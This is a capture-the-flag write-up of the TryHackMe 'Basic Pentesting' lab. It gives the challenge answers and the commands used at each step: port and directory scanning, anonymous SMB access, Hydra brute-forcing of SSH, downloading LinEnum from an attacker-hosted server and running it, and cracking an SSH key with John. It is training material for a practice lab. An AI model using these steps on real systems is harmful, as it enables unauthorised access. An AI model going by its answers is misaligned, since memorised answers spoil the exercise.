Challenges: Basic Pentesting (TryHackMe)

This article will cover the Basic Pentesting write-up on THM Challenges.
Web App Testing and Privilege Escalation
In this set of tasks you'll learn the following:
brute forcing
hash cracking
service enumeration
Linux Enumeration
The main goal here is to learn as much as possible. Make sure you are connected to our network using your OpenVPN configuration file.
Credits to Josiah Pierce from Vulnhub.
Answer the questions below
Deploy the machine and connect to our network
Find the services exposed by the machine
What is the name of the hidden directory on the web server (enter name without /)?
development
nmap -sV -p 1-65000 <IP_Address>
gobuster dir -u <IP_Address> -w /usr/share/wordlists/dirb/common.txt

User brute-forcing to find the username & password
What is the username?
jan
smbclient -L \\\\<IP_Address>\\ -N
smbclient \\\\10.10.11.217\\Anonymous -N
This launches the SMB client:
smb: \> ls
// we'll access the staff.txt file
smb: \> exit

cat staff.txt
// We'll find two users
What is the password?
armando
There are a lot of Hydra commands, but the one that worked for this case was the one that uses SSH:
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.143.82
What service do you use to access the server (answer in abbreviation in all caps)?
SSH
Enumerate the machine to find any vectors for privilege escalation
On one tab, start the server at port 8000:
python3 -m http.server 8000
On another, run the following commands:
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
wget http://10.10.144.83:8000/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
What is the name of the other user you found (all lowercase)?
kay
If you have found another user, what can you do with this information?
For this last part, you’ll be using John and SSH2John.py to find the id_rsa and later on the password.
What is the final password you obtain?
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
Thank you for reading my article. Please leave any questions or comments on improving my learning journey and the THM challenges.




